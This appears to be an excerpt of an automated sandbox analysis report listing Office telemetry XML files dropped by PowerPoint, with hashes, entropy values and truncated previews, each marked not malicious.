                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Charting" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCharting" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Event
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):4.9029116128103984
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d97gJDCuct1k3BNjXMi+EsdnKE+2h6wl/Ff/T/:cNgZCucteNjXMzbdKshBd3T/
                                                                                                                              MD5:915D63DD4F21953BF9FB875789DC6672
                                                                                                                              SHA1:B6ABADB61FA2CCF7C953842169D0610AD62021D1
                                                                                                                              SHA-256:3AB68B45F413E0E14E558F7E9326D269B31BAC2753B2FF174C2D52D2513897A8
                                                                                                                              SHA-512:987AB800473D047491D296ED07A93EBE4FD241BEBC806CCA750D86F1C59B5180C96BB723796FC02430D38A3F6186354E1BFD6D5A15A2CFA2BC117357E16559E7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Charting.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCharting" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):437
                                                                                                                              Entropy (8bit):5.441976209389148
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd90erLyC4FDR6A3AQi9YX4zI3s0dWNAuXyz:2d9nyC0DR69YX4zsVWAz
                                                                                                                              MD5:F5FDEBF7B5375E33ACF21055A3946FC1
                                                                                                                              SHA1:7ED92AE24B96B4608603818468AB74C1BFA752A9
                                                                                                                              SHA-256:178BC3F299238EF8730403F9B70FC31E146A776F28EC614B53A692991C4BDFA8
                                                                                                                              SHA-512:E62C03E3DA6426FC807B6C33E9D2C5971FCA0DA85E9D9BDDC9C372B67D10BC8101EBE7E68B8F10C86801A41099A31BECBEDC4402639FDEE207C102D831379944
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70030" V="0" DC="SM" EN="Office.AirSpace.GraphicsHwCrashUsingSw" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="336" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="W" I="0" O="true" N="AppCrashingInHw">.. <S T="1" F="AppCrashingInHw" M="Ignore" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):440
                                                                                                                              Entropy (8bit):5.389638807153727
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9dd2ATaBC4FDR6A3AQiBsX4zIVlVZmz:2d9+DC0DR6BsX4zUPkz
                                                                                                                              MD5:928700588ECE445DC46E00B95FB9B504
                                                                                                                              SHA1:4A85D57B655B60B8C38F44A12575A943243B4054
                                                                                                                              SHA-256:F9F56112FEDF17A35F448F809D7E0A6D59B525219F255CB75FB6F466366CD18A
                                                                                                                              SHA-512:9D30FE6F13A876A36E9CB9642F928AE100D13706A2684E92750A8387EE64F7B68C15BBC80F300A333FC23575C28408B28F13377675D7B58E1F0B866A03BA0FEF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70031" V="0" DC="SM" EN="Office.AirSpace.NullDeviceContextCopyTextureToMemory" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="220" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.854268399216
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9LR7DduMt1k3BNjXMi+EsdnKE+2h6wl/FfIIqx:cVRHduMteNjXMzbdKshBdox
                                                                                                                              MD5:6ABE856CB6F54E1DB4E95086C20F3776
                                                                                                                              SHA1:324EB1D676E1457E2C2428BA311E93D1B4047D8A
                                                                                                                              SHA-256:CBE147191A1C30DB3BB4836B139E09B8B4E204C70776F660E46FAEB681E645D7
                                                                                                                              SHA-512:6FD183DAA1ADD52C7052F2FA848D619D58BA76415432D0E450C72BAA5C1B441BE4C69E86DA669458B53C3FB73677D2E6AE960E59361534DE9D4B759A5FEC9798
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.889160946895956
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9sDIODduct1k3BNjXMi+EsdnKE+2h6wl/FfIIqx:cMI+ducteNjXMzbdKshBdox
                                                                                                                              MD5:014D6F1DB5F0297A5D859D18CFB47814
                                                                                                                              SHA1:A535D22603DFD6E758C732664F6B6ADEAAB6CAC3
                                                                                                                              SHA-256:77EC9CCD987BD23F76084875556DCEC7AEFEF4A1B940EC5471AA883B05272F74
                                                                                                                              SHA-512:369375EB96641827BA7AC10CC239EFDB967EFD1AE9F8A022950E2DD2FAEBE5F181AF5746811B8C37DC81EEFCBCCB5F16A6B5FBD27214032E2ED1745FBBE8D25C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):419
                                                                                                                              Entropy (8bit):5.367348644606108
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9MlAAyC4FDR6A3AQiQvX4zI/JvFKtz:2d9MllyC0DR6QvX4zmFQz
                                                                                                                              MD5:2E43EC48DE8A104DF14C92773DE6ED78
                                                                                                                              SHA1:58CE79F5CDEDDE4C1797538B9D328ED1BDA82014
                                                                                                                              SHA-256:B454494A37D8E764AA1CBA6163CD729B3DAC7C3E5ACAD48ADFC71CA2D9137A96
                                                                                                                              SHA-512:BEBBD87D3178E69E5A418262000D7650E0CBD55986E78F8E1FF531BC98E56DFC89736F08C54271309CF4332EF22B78C8900E2C1B8C72FAD96F9AC8BE94C98189
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70036" V="0" DC="SM" EN="Office.AirSpace.AirSpaceCreateWindowFailure" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="343" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="U32" I="0" O="false" N="ErrorCode">.. <S T="1" F="value1" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):439
                                                                                                                              Entropy (8bit):5.351360933657103
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9BPC4FDR6A3AQzxKX4zIRBLqh3yh4Qz:2d9BPC0DR6jX4zOoQz
                                                                                                                              MD5:082F11ABD0FB7A1B0F626F54A7BBF7C6
                                                                                                                              SHA1:09A7BDDD3F239D4570777C9FBF1705047956377A
                                                                                                                              SHA-256:D04DA8E38AA70A4CD15020C09512C760B6E28141DE0C962D8F9C83184E00774B
                                                                                                                              SHA-512:7ABA5BC2387F736C667496834681B103F81A45F5C3261494D283DDE405A707B6B7CDDAFB1B75294E9D27C683E83D36AB679908DAFDB56C59D3BF73E399C4E607
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70037" V="1" DC="SM" EN="Office.AirSpace.AirSpaceWinCompIsEnabled" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" SP="CriticalBusinessImpact" S="1" DL="B" DCa="DC" xmlns="">.. <S>.. <Etw T="1" E="486" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="B" I="0" O="false" N="WinCompEnabled">.. <S T="1" F="WinCompEnabled" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1365
                                                                                                                              Entropy (8bit):4.8496747496264785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9QyijDGipuMt1k3BNjXMi+EsdnKE+2h6wl/Ffklwz:cSyUGYuMteNjXMzbdKshBdpz
                                                                                                                              MD5:F8CB7A14632ADC43770DBE2DFF5761B9
                                                                                                                              SHA1:B938ED261FBD165DE9A3999EB8AD2A68DDCDCF8F
                                                                                                                              SHA-256:8CA0F812B0525116C2973F8A3F7284C7EB2D473AC7408E788F9F702BB8F6EC02
                                                                                                                              SHA-512:93AC63DF654D3881822784221BFA6D77F24362FEFD3F37291298606B999CFAEDB058E6B412667FFC30F4E3496FA84CB00DA8E8A339D8CFD474C49FF34189C80E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="Eve
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1402
                                                                                                                              Entropy (8bit):4.884832595325388
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9zykDGipuct1k3BNjXMi+EsdnKE+2h6wl/Ffklwz:cFy4GYucteNjXMzbdKshBdpz
                                                                                                                              MD5:93D58FAF26AD639382D9AE4999A9BD97
                                                                                                                              SHA1:2AEF79A237AB97426A0C7B25E925F7C6F19783E6
                                                                                                                              SHA-256:8994FE1D90B166408A2E9A5F9717F5DE596F7830D21F37A9C3DAF22BF58EF538
                                                                                                                              SHA-512:8473E33439CE9BEF4A0C0AE34797C452CE40D9AE7C97D1673717D449D35954C3CDEC41070E9E5AE4B1C232E5C0CC372045FAEF879D090247B693D52E8D4129AA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1355
                                                                                                                              Entropy (8bit):4.852626468622731
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9EFDMYBuMt1k3BNjXMi+EsdnKE+2h6wl/FfUq/VU:cSlTuMteNjXMzbdKshBd8qNU
                                                                                                                              MD5:E9A18B3BBBBE356BCB740DE5A7A4AE11
                                                                                                                              SHA1:637C71DAF762CA7B33210B9AF8A02FCE72F1270C
                                                                                                                              SHA-256:0D1A74F09E8A4D190EC01C88920A9FD60EB83FB871A7F14AA90A489099E64C6E
                                                                                                                              SHA-512:B71719F4C12C032CAA22736D9D8FA30D7D850F6042416F108204C4D309B7E50673A28139C9AA0B52FF0C9310256EC5F0C14A3126317AF8E70F0290254B467C05
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Docs" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDocs" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):4.888202547105148
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9tRfDMYBuct1k3BNjXMi+EsdnKE+2h6wl/FfUq/VU:cd7TucteNjXMzbdKshBd8qNU
                                                                                                                              MD5:85F2AA6E03D6F71C1A7E106D72A8D0DA
                                                                                                                              SHA1:47FA82A3DBA72BF31D574F9B4575768D85427EF3
                                                                                                                              SHA-256:FBECE936265F31803397EF5320F8A0EE99C6818228C487B51E29AB9956B90B1A
                                                                                                                              SHA-512:9CF81AD16C640DA8EE357F8A638008A01CE1743454F5D60084423DBDB1F65DFF4183472B3C4AB0530BBC77E35A1C9BE890B9D05DEA8D948570C10DEB63417A05
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Docs.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenDocs" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1367
                                                                                                                              Entropy (8bit):4.871520531670135
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9YVVDthDBTuMt1k3BNjXMi+EsdnKE+2h6wl/FfiV:cOFtRBTuMteNjXMzbdKshBd0
                                                                                                                              MD5:D8B7AF104539DF090111CAFB1437338F
                                                                                                                              SHA1:214B87FD53ED28A6FC1C0AFC34DBE492A18C8316
                                                                                                                              SHA-256:3E4A318563596DB51DE3B1CE0E3CA1C294A04BDEF7A36B4B16EB5F111C608E6A
                                                                                                                              SHA-512:F3EE2D321E591430E49516D752CE4FAA3E5C29FAEB27463A639B51D22559D44738CE33A2079902F53D33E9554A083C194DDB79F79CA8D6C94F6B4BFF00194CEF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="E
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.905620042369503
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9YV6BDBTuct1k3BNjXMi+EsdnKE+2h6wl/FfiV:cO6xBTucteNjXMzbdKshBd0
                                                                                                                              MD5:C1B228335686052262C647EE69D8792E
                                                                                                                              SHA1:E326223CCF34590A8AF4E3266F1CAB17EDF2BAEA
                                                                                                                              SHA-256:8C63F9B47B20C6A205BF927D668982CCC94C1DCDBC0B4933F8AC9638E8F845BE
                                                                                                                              SHA-512:EAD1CD154D2731291E33E59B61B690CE336D79D8B9FCED26D606D76FB7D6C73BB2CAC410C668ECDD9CF553C6B3481AD430595BBFA234E2877941B067867B6305
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1355
                                                                                                                              Entropy (8bit):4.851683930128282
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9YenNDRhuMt1k3BNjXMi+EsdnKE+2h6wl/Ff0U3Xj:c5nNRhuMteNjXMzbdKshBdMoXj
                                                                                                                              MD5:D41C791A8FC27E2CE3121D2E3453FD56
                                                                                                                              SHA1:9B60F0FB06951429600614130DF20E6AD1B3550F
                                                                                                                              SHA-256:55EADE0997116B5AF5B42E03758B1CAE77FB0BF8D1386E2AD1680F18DB2D14C8
                                                                                                                              SHA-512:308A887C0E37E74653B166CAEFF2472926A72DE647E8F10C9C51D5F0FA96E63D76DA9FF4C9D76BD76D9B6720A2E822EE5C3ED2CD4203D30D478515C2D46400DA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Help" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenHelp" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):4.886909274939712
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9YZXDRhuct1k3BNjXMi+EsdnKE+2h6wl/Ff0U3Xj:c+TRhucteNjXMzbdKshBdMoXj
                                                                                                                              MD5:463F9A9DCDECD284129BF17C3198F7F5
                                                                                                                              SHA1:A6E4A6AEEA9DAF61381BA31C24292B0D99B609A6
                                                                                                                              SHA-256:CDCC41431C2093E4DF7B87CBC8EB2FB0CB10D326B7696531C5EDA2249BB214E6
                                                                                                                              SHA-512:68AB44669415D094A58C7F95C96444412EDEC548273FE0CA0ED4C473A33C748B65CEA8EE66527D8C4F5B98B8DB01165D15F849DC365573F19CAB0CA8BC7AFFE3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Help.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenHelp" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
